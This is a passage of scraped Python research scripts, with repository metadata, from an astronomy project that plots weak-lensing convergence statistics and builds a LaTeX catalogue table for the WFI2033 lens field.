rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,19)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{zM^2}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6, direction='up')\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 16\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\nplt.legend(bbox_to_anchor=(1.5, 4), loc='center left', borderaxespad=0., fontsize=10)\n\n#plt.subplots_adjust(top=0.6)\n\nplt.tight_layout()\n\nplt.savefig('%s_overdensities_%s_size%s_i%s.png' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), dpi=1000)\n\n#plt.show()\n\nos.system(\"rm fieldshistW1_50_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW2_50_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW3_50_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW4_50_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW1_75_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW2_75_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW3_75_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW4_75_%s_%s_size%s_i%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\n\nif str(sys.argv[2]) == \"samp\":\n print(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.5304328799247742, "alphanum_fraction": 0.63150954246521, "avg_line_length": 92.83505249023438, "blob_id": "d768f965b1fde09558c6338d90c4580c4ffbcf4b", "content_id": "ef432f83fdd4b417f6e117dd902f3898b3e15164", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9102, "license_type": "no_license", "max_line_length": 377, "num_lines": 97, "path": "/python/plot_utilities/plotkappabar_disjointgalgammaoneoverr.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the output statistics produced by plotkappacompletestatistics.py/plotkappabiascompletestatistics.py in order to plot bars. Run without arguments. Make sure the uncomment the appropriate ax.set_ylim, ylabel and savefig lines\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappa/\"\ndata = np.genfromtxt('%smedstd.dat' % root,dtype=['S1000','f8','f8','f8','f8'])\n\nkappastat = np.array([])\nfor i in range(np.shape(data)[0]):\n if i == 0:\n kappastat = np.array([data[i][0],data[i][1],data[i][2],data[i][3],data[i][4]])\n else:\n x = np.array([data[i][0],data[i][1],data[i][2],data[i][3],data[i][4]])\n kappastat = np.c_[kappastat,x]\n\nkappastat_45 = np.c_[ kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_22.5_med_increments4_4_emptymsk.cat'][0][1:].astype(float), # 1-1/r\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_z_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass2_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass3_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_22.5_med_increments4_4_4_emptymsk.cat'][0][1:].astype(float), # 1/r\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_zoverr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z/r\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_massoverr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # massoverr\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass2overr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overr\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass3overr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overr\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass2rms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2rms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass3rms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3rms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass2overrrms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overrrms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_mass3overrrms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overrrms\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_flexion_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # flexion\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_tidal_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # tidal\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_SIS_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # SIS\n kappastat.T[kappastat[0]=='fiducial_45_gal_45_gamma_45_oneoverr_45_SIShalo_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float)] # SIShalo\n\nkappastat_120 = np.c_[ kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_22.5_med_increments4_4_emptymsk.cat'][0][1:].astype(float), # 1-1/r\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_z_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass2_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass3_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_22.5_med_increments4_4_4_emptymsk.cat'][0][1:].astype(float), # 1/r\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_zoverr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # z/r\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_massoverr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # massoverr\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass2overr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overr\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass3overr_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overr\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass2rms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2rms\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass3rms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3rms\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass2overrrms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass2overrrms\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_mass3overrrms_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # mass3overrrms\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_flexion_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # flexion\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_tidal_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # tidal\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_SIS_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float), # SIS\n kappastat.T[kappastat[0]=='fiducial_120_gal_120_gamma_120_oneoverr_120_SIShalo_22.5_med_increments4_4_4_4_emptymsk.cat'][0][1:].astype(float)] # SIShalo\n\nN = 18\nind = 2.5 * np.arange(N) # the x locations for the groups\nwidth = 0.8 # the width of the bars\n\nax = plt.subplot(2,1,1)\n\ncol1 = (kappastat_45[0])\nrects1 = ax.bar(ind + width, col1, width, color='r')\ncol2 = (kappastat_120[0])\nrects2 = ax.bar(ind + 2*width, col2, width, color='b')\n\n#ax.set_ylim([0.00,0.05])\nax.set_ylim([-0.02,0.08])\nax.set_ylabel('median$_\\kappa$')\n#ax.set_ylabel('$\\mathrm{median}_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\n\nax = plt.subplot(2,1,2)\n\ncol3 = (kappastat_45[1])\nrects3 = ax.bar(ind + width, col3, width, color='r')\ncol4 = (kappastat_120[1])\nrects4 = ax.bar(ind + 2*width, col4, width, color='b')\n\nax.set_ylim([0,0.08])\nax.set_ylabel('$\\sigma_\\kappa$')\n#ax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\nax.legend((rects1[0], rects2[0]), ('45 22.5 gal+1/r+$\\gamma$+', '120 22.5 gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.65, 1.4), fontsize=10)\n#ax.legend((rects1[0], rects2[0]), ('45 22.5 gal+1/r+$\\gamma$+', '120 22.5 gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.3, 0.97), fontsize=10)\nplt.subplots_adjust(left=0.15, bottom=0.15, right=0.95, top=0.95, wspace=0.7, hspace=0.7)\nplt.savefig('%skappashistbar-disjointgalgammaoneoverr.png' % root, dpi=250)\n\nplt.clf()\n" }, { "alpha_fraction": 0.5019049048423767, "alphanum_fraction": 0.5699850916862488, "avg_line_length": 73.5308609008789, "blob_id": "75886393df505e18bdb5a2889bcdc2f1d37d42d7", "content_id": "c59a0658efa8d7bcf7ecdae02951159e9d0f85c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6037, "license_type": "no_license", "max_line_length": 717, "num_lines": 81, "path": "/python/catalogue_utilities/tabletotex_Sluse18zMstar.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Takes a table and returns a custom latex version content\nimport numpy as np\nimport os\nfrom os import system\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\n################## read catalogue\nfilein = '/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat'\nra = 2\ndec = 3\nitot = 4\nspec = 40\nz_eazy = 48\nz_inf = 50\nz_sup = 51\nmass_best = 92\nmass_inf = 93\nmass_med = 94\nmass_sup = 95\nclass_eazy = 98\ndata = np.loadtxt(filein,usecols=[ra,dec,itot,spec,z_eazy,z_inf,z_sup,mass_best,mass_inf,mass_med,mass_sup,class_eazy],unpack=False)\nprint np.shape(data)\nra = 0\ndec = 1\nitot = 2\nspec = 3\nz_eazy = 4\nz_inf = 5\nz_sup = 6\nmass_best = 7\nmass_inf = 8\nmass_med = 9\nmass_sup = 10\nclass_eazy = 11\nlens = SkyCoord(308.4253, -47.39528, unit='deg')\nx = SkyCoord(243.079849, 53.012886, unit='deg')\nx = SkyCoord(data[:,ra], data[:,dec], unit='deg')\nsep = x.separation(lens).arcsec\ndata = np.c_[data,sep]\nsep = 12\n\n################## impose conditions\n# for missing mass_med take its error bars to be typical for that mag range\nerrbar18 = np.median(data[:,mass_med][(data[:,itot]>15) & (data[:,itot]<18) & (data[:,mass_med]!=-99)] - data[:,mass_inf][(data[:,itot]>15) & (data[:,itot]<18) & (data[:,mass_med]!=-99)])\nerrbar19 = np.median(data[:,mass_med][(data[:,itot]>18) & (data[:,itot]<19) & (data[:,mass_med]!=-99)] - data[:,mass_inf][(data[:,itot]>18) & (data[:,itot]<19) & (data[:,mass_med]!=-99)])\nerrbar20 = np.median(data[:,mass_med][(data[:,itot]>19) & (data[:,itot]<20) & (data[:,mass_med]!=-99)] - data[:,mass_inf][(data[:,itot]>19) & (data[:,itot]<20) & (data[:,mass_med]!=-99)])\nerrbar21 = np.median(data[:,mass_med][(data[:,itot]>20) & (data[:,itot]<21) & (data[:,mass_med]!=-99)] - data[:,mass_inf][(data[:,itot]>20) & (data[:,itot]<21) & (data[:,mass_med]!=-99)])\nerrbar22 = np.median(data[:,mass_med][(data[:,itot]>21) & (data[:,itot]<22) & (data[:,mass_med]!=-99)] - data[:,mass_inf][(data[:,itot]>21) & (data[:,itot]<22) & (data[:,mass_med]!=-99)])\nerrbar23 = np.median(data[:,mass_med][(data[:,itot]>21) & (data[:,mass_med]!=-99)] - data[:,mass_inf][(data[:,itot]>21) & (data[:,mass_med]!=-99)])\ndata[:,mass_best][data[:,mass_best] < 0] = 9\ndata[:,mass_best][data[:,mass_med] > 0] = data[:,mass_med][data[:,mass_med] > 0]\ndata[:,mass_inf][(data[:,mass_inf] < 0) & (data[:,itot]>15) & (data[:,itot]<18)] = data[:,mass_best][(data[:,mass_inf] < 0) & (data[:,itot]>15) & (data[:,itot]<18)] - errbar18\ndata[:,mass_inf][(data[:,mass_inf] < 0) & (data[:,itot]>18) & (data[:,itot]<19)] = data[:,mass_best][(data[:,mass_inf] < 0) & (data[:,itot]>18) & (data[:,itot]<19)] - errbar19\ndata[:,mass_inf][(data[:,mass_inf] < 0) & (data[:,itot]>19) & (data[:,itot]<20)] = data[:,mass_best][(data[:,mass_inf] < 0) & (data[:,itot]>19) & (data[:,itot]<20)] - errbar20\ndata[:,mass_inf][(data[:,mass_inf] < 0) & (data[:,itot]>20) & (data[:,itot]<21)] = data[:,mass_best][(data[:,mass_inf] < 0) & (data[:,itot]>20) & (data[:,itot]<21)] - errbar21\ndata[:,mass_inf][(data[:,mass_inf] < 0) & (data[:,itot]>21) & (data[:,itot]<22)] = data[:,mass_best][(data[:,mass_inf] < 0) & (data[:,itot]>21) & (data[:,itot]<22)] - errbar22\ndata[:,mass_inf][(data[:,mass_inf] < 0) & (data[:,itot]>21)] = data[:,mass_best][(data[:,mass_inf] < 0) & (data[:,itot]>21)] - errbar23\ndata[:,mass_sup][(data[:,mass_sup] < 0) & (data[:,itot]>15) & (data[:,itot]<18)] = data[:,mass_best][(data[:,mass_sup] < 0) & (data[:,itot]>15) & (data[:,itot]<18)] + errbar18\ndata[:,mass_sup][(data[:,mass_sup] < 0) & (data[:,itot]>18) & (data[:,itot]<19)] = data[:,mass_best][(data[:,mass_sup] < 0) & (data[:,itot]>18) & (data[:,itot]<19)] + errbar19\ndata[:,mass_sup][(data[:,mass_sup] < 0) & (data[:,itot]>19) & (data[:,itot]<20)] = data[:,mass_best][(data[:,mass_sup] < 0) & (data[:,itot]>19) & (data[:,itot]<20)] + errbar20\ndata[:,mass_sup][(data[:,mass_sup] < 0) & (data[:,itot]>20) & (data[:,itot]<21)] = data[:,mass_best][(data[:,mass_sup] < 0) & (data[:,itot]>20) & (data[:,itot]<21)] + errbar21\ndata[:,mass_sup][(data[:,mass_sup] < 0) & (data[:,itot]>21) & (data[:,itot]<22)] = data[:,mass_best][(data[:,mass_sup] < 0) & (data[:,itot]>21) & (data[:,itot]<22)] + errbar22\ndata[:,mass_sup][(data[:,mass_sup] < 0) & (data[:,itot]>21)] = data[:,mass_best][(data[:,mass_sup] < 0) & (data[:,itot]>21)] + errbar23\ndata = data[data[:,itot] <= 23]\ndata = data[data[:,class_eazy] >= 0]\ndata = data[data[:,sep] <= 120]\ndata[:,z_eazy][data[:,spec] > 0] = data[:,spec][data[:,spec] > 0]\ndata[:,z_inf][data[:,spec] > 0] = data[:,spec][data[:,spec] > 0]\ndata[:,z_sup][data[:,spec] > 0] = data[:,spec][data[:,spec] > 0]\n\nprint np.shape(data)\n\n################## write tex file\nfileout = '/Users/cerusu/GITHUB/H0LiCOW/papers/WFI2033Environment/table_zMstar.tex'\nf = open(fileout,'w')\nfor i in range(np.shape(data)[0]/2):\n f.write('%.5f & $%.5f$ & %.1f & $%.3f_{-%.3f}^{+%.3f}$ & $%.2f_{-%.2f}^{+%.2f}$ & %.5f & $%.5f$ & %.1f & $%.3f_{-%.3f}^{+%.3f}$ & $%.2f_{-%.2f}^{+%.2f}$\\\\\\\\\\n' % (data[:,ra][2*i],data[:,dec][2*i],data[:,sep][2*i],data[:,z_eazy][2*i],data[:,z_eazy][2*i]-data[:,z_inf][2*i],data[:,z_sup][2*i]-data[:,z_eazy][2*i],data[:,mass_best][2*i],data[:,mass_best][2*i]-data[:,mass_inf][2*i],data[:,mass_sup][2*i]-data[:,mass_best][2*i], data[:,ra][2*i+1],data[:,dec][2*i+1],data[:,sep][2*i+1],data[:,z_eazy][2*i+1],data[:,z_eazy][2*i+1]-data[:,z_inf][2*i+1],data[:,z_sup][2*i+1]-data[:,z_eazy][2*i+1],data[:,mass_best][2*i+1],data[:,mass_best][2*i+1]-data[:,mass_inf][2*i+1],data[:,mass_sup][2*i+1]-data[:,mass_best][2*i+1]))\nif np.shape(data)[0] % 2 == 1:\n f.write('%.5f & $%.5f$ & %.1f & $%.3f_{-%.3f}^{+%.3f}$ & $%.2f_{-%.2f}^{+%.2f}$ \\\\\\\\\\n' % (data[:,ra][2*i+2],data[:,dec][2*i+2],data[:,sep][2*i+2],data[:,z_eazy][2*i+2],data[:,z_eazy][2*i+2]-data[:,z_inf][2*i+2],data[:,z_sup][2*i+2]-data[:,z_eazy][2*i+2],data[:,mass_best][2*i+2],data[:,mass_best][2*i+2]-data[:,mass_inf][2*i+2],data[:,mass_sup][2*i+2]-data[:,mass_best][2*i+2]))\nf.close()\n" }, { "alpha_fraction": 0.5631828308105469, "alphanum_fraction": 0.6149086356163025, "avg_line_length": 46.2146110534668, "blob_id": "391376a3814dbe0202b6caa8fe64752d207a7e67", "content_id": "820215b9f3540acd69ed9adc81e7f5fe51b7326d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10343, "license_type": "no_license", "max_line_length": 305, "num_lines": 219, "path": "/python/kappahist.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "\n# run as: python kappahist.py /Volumes/G-RAIDStudio/simulations/lensing_simulations/Guo_galaxies/GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_orig_size45_i24_ratioquick.lst constraints\n#where constraints are eg: gal 1.52 0.05 oneoverr 1.69 0.05 mass 1.9 0.10 z 1.45 0.05 mass2 2.15 0.4 mass2rms 1.5 0.1 mass3 2.1 0.4 mass3rms 1.3 0.1 zoverr 1.6 0.05 massoverr 2.4 0.15 mass2overr 3.3 0.3 mass3overr 3.3 0.3 mass2overrrms 1.9 0.1 mass3overrrms 1.7 0.15 zmassoverr 2.4 0.1 zmass2overr 2.9 0.4\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nfrom scipy import stats\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\nimport matplotlib.pyplot as plt\nfrom scipy.stats.kde import gaussian_kde\nfrom numpy import linspace\n\nstart_time=time.time()\n\nq_gal=0\nq_oneoverr=0\nq_zweight=0\nq_mass=0\nq_mass2=0\nq_mass2rms=0\nq_mass3=0\nq_mass3rms=0\nq_zoverr=0\nq_massoverr=0\nq_mass2overr=0\nq_mass3overr=0\nq_mass2overrrms=0\nq_mass3overrrms=0\nq_zmassoverr=0\nq_zmass2overr=0\n\ndegree=np.pi/180\nL_field=4.0*degree\nN_pix_per_dim = 4096\nL_pix = L_field / N_pix_per_dim\nos.system(\"ls /Volumes/G-RAIDStudio/simulations/lensing_simulations/ > /Volumes/G-RAIDStudio/simulations/lensing_simulations/ls.lst\")\nlistname=[]\nwith open(\"/Volumes/G-RAIDStudio/simulations/lensing_simulations/ls.lst\") as filelist:\n for l in filelist:\n listname=listname+[l[0:len(l)-1]]\n\nfor i in range(int(len(sys.argv)-1)/3):\n if str(sys.argv[int(3*i+2)])==\"gal\":\n q_gal=float(sys.argv[int(3*i+3)])\n q_gal_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"oneoverr\":\n q_oneoverr=float(sys.argv[int(3*i+3)])\n q_oneoverr_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"z\":\n q_zweight=float(sys.argv[int(3*i+3)])\n q_zweight_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass\":\n q_mass=float(sys.argv[int(3*i+3)])\n q_mass_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass2\":\n q_mass2=float(sys.argv[int(3*i+3)])\n q_mass2_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass2rms\":\n q_mass2rms=float(sys.argv[int(3*i+3)])\n q_mass2rms_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass3\":\n q_mass3=float(sys.argv[int(3*i+3)])\n q_mass3_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass3rms\":\n q_mass3rms=float(sys.argv[int(3*i+3)])\n q_mass3rms_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"zoverr\":\n q_zoverr=float(sys.argv[int(3*i+3)])\n q_zoverr_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"massoverr\":\n q_massoverr=float(sys.argv[int(3*i+3)])\n q_massoverr_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass2overr\":\n q_mass2overr=float(sys.argv[int(3*i+3)])\n q_mass2overr_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass3overr\":\n q_mass3overr=float(sys.argv[int(3*i+3)])\n q_mass3overr_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass2overrrms\":\n q_mass2overrrms=float(sys.argv[int(3*i+3)])\n q_mass2overrrms_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"mass3overrrms\":\n q_mass3overrrm=float(sys.argv[int(3*i+3)])\n q_mass3overrrm_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"zmassoverr\":\n q_zmassoverr=float(sys.argv[int(3*i+3)])\n q_gal_lim=float(sys.argv[int(3*i+4)])\n if str(sys.argv[int(3*i+2)])==\"zmass2overr\":\n q_zmass2overr=float(sys.argv[int(3*i+3)])\n q_zmass2overr_lim=float(sys.argv[int(3*i+4)])\nkappa=np.array([])\n#kappa_galonly=np.array([])\n#kappa_noconstr=np.array([])\ncnts=0\nwith open(str(sys.argv[1])) as file:\n for line in file:\n cnts=cnts+1\n if cnts%1000==0:\n print cnts\n ok=1\n #ok_galonly=1\n ID=line.split()[1]\n posx=float(line.split()[3])\n posy=float(line.split()[4])\n q_gal_file=float(line.split()[6])\n q_oneoverr_file=float(line.split()[8])\n 